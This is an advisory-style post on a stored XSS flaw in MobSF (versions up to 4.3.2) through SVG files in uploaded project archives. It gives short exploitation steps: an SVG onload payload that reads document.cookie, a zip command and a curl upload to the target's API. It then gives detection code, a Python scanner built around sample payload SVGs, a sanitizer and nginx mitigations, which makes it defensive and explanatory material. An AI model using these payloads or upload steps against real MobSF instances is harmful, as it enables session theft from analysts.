MobSF (<= v4.3.2) is vulnerable to stored Cross-Site Scripting (XSS) through SVG files extracted during analysis of an uploaded Android Studio project. When an attacker uploads a crafted project archive containing an SVG with embedded JavaScript, MobSF does not sanitize or quarantine the file during extraction. The SVG is written to `~/.MobSF/downloads/` and served by the web interface at `http://127.0.0.1:8081/download/filename.svg`. A browser that opens that URL directly renders the SVG as a document, so the script runs in the MobSF origin and the attacker obtains the victim's session.
DailyCVE Form:
Platform: MobSF
Version: <=4.3.2
Vulnerability: Stored XSS
Severity: High
Date: 2024-XX-XX
What Undercode Say:
Exploitation:
1. Craft a malicious SVG (an `onload` handler fires as soon as the document is rendered):
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>
2. Place the SVG inside the project tree and package the project as a zip (MobSF accepts zipped source projects, not only APKs):
zip -r malicious_apk.zip /path/to/project
3. Upload to MobSF (the REST API requires the instance's API key in the Authorization header):
curl -F 'file=@malicious_apk.zip' -H 'Authorization: <api_key>' http://target:8081/api/v1/upload
Detection:
Check SVG handling in MobSF:
import re

def is_safe_svg(content):
    # Checking only for <script and javascript: misses the onload= payload used above,
    # so event-handler attributes (on*=) are matched as well.
    return not re.search(r'<script|javascript:|\son\w+\s*=', content, re.I)
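A regex over the raw bytes is easy to bypass (attribute names split by namespaces, whitespace or case tricks). The following is an added example, not MobSF's own code: it builds a constructed project archive in memory containing a benign icon plus the three payload shapes a browser executes when it renders an SVG as a document (`on*` handler, `<script>` element, `javascript:` href), then scans every SVG entry with an XML parser before anything is extracted to disk. Paths, file names and the use of the stdlib `xml.etree` parser are assumptions for the example; in production wrap parsing with `defusedxml` to cover entity-expansion attacks.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET  # assumption: stdlib parser; use defusedxml in production

# Constructed sample files (not from the advisory): one benign icon and three payloads.
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
              b'<rect width="10" height="10"/></svg>')
ONLOAD_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>'
SCRIPT_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>'
HREF_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            b'<a xlink:href="javascript:alert(1)"><text y="10">x</text></a></svg>')


def build_project_zip() -> bytes:
    """Build an in-memory Android Studio-style project zip (assumed layout) with SVG resources."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("app/src/main/AndroidManifest.xml", b"<manifest/>")
        zf.writestr("app/src/main/res/drawable/icon.svg", BENIGN_SVG)
        zf.writestr("app/src/main/res/drawable/onload.svg", ONLOAD_SVG)
        zf.writestr("app/src/main/res/drawable/script.svg", SCRIPT_SVG)
        zf.writestr("app/src/main/res/drawable/link.SVG", HREF_SVG)  # extension case varies
    return buf.getvalue()


def _local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1]


def svg_findings(data: bytes) -> list[str]:
    """Return a list of reasons this SVG is unsafe to serve inline (empty list = clean)."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # A browser will not render broken XML as SVG, but reject it rather than guess.
        return [f"unparseable XML ({exc})"]
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag.lower() in ("script", "foreignobject"):
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):
                findings.append(f"event handler {name}= on <{tag}>")
            elif name == "href":
                # Browsers strip ASCII control chars/whitespace inside URLs, so do the same
                # before comparing, otherwise "java\tscript:" slips through.
                cleaned = re.sub(r"[\x00-\x20]", "", value).lower()
                if cleaned.startswith("javascript:"):
                    findings.append(f"javascript: URL in href on <{tag}>")
    return findings


def scan_project_zip(archive: bytes) -> dict[str, list[str]]:
    """Map each SVG entry that must be rejected or quarantined to its findings.

    Run this over the upload before extraction, so nothing unsafe reaches the
    downloads directory the web interface serves from.
    """
    flagged: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".svg"):
                continue
            findings = svg_findings(zf.read(info))
            if findings:
                flagged[info.filename] = findings
    return flagged


if __name__ == "__main__":
    for entry, reasons in scan_project_zip(build_project_zip()).items():
        print(f"{entry}: {'; '.join(reasons)}")
```

The scanner keys off the `.svg` extension; if the served path is chosen by the client, extend it to sniff any entry whose content starts with an `<svg` root, since the file name is attacker-controlled too.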
Mitigation:
1. Update MobSF to v4.3.3+.
2. Sanitize SVG uploads:
from lxml import etree

def sanitize_svg(svg_file):
    parser = etree.XMLParser(resolve_entities=False)
    tree = etree.parse(svg_file, parser)
    # '//[@onload]' is not valid XPath. Walk every element, drop every on* handler
    # attribute (not only onload) and remove <script> elements regardless of namespace.
    for elem in tree.xpath('//*'):
        for attr in list(elem.attrib):
            if etree.QName(attr).localname.lower().startswith('on'):
                del elem.attrib[attr]
    for script in tree.xpath('//*[local-name()="script"]'):
        script.getparent().remove(script)
    return etree.tostring(tree)
3. Restrict file access:
The files are served under `/download/` (as in the URL above), so the rule in a fronting nginx must match that path. A blanket deny also blocks legitimate report downloads; forcing an attachment disposition keeps downloads working while stopping the browser from rendering the SVG inline:
location /download/ { add_header Content-Disposition "attachment" always; }
If downloads are not needed at all, `location /download/ { deny all; }` is the simpler option.
References:
Sources:
Reported By: github.com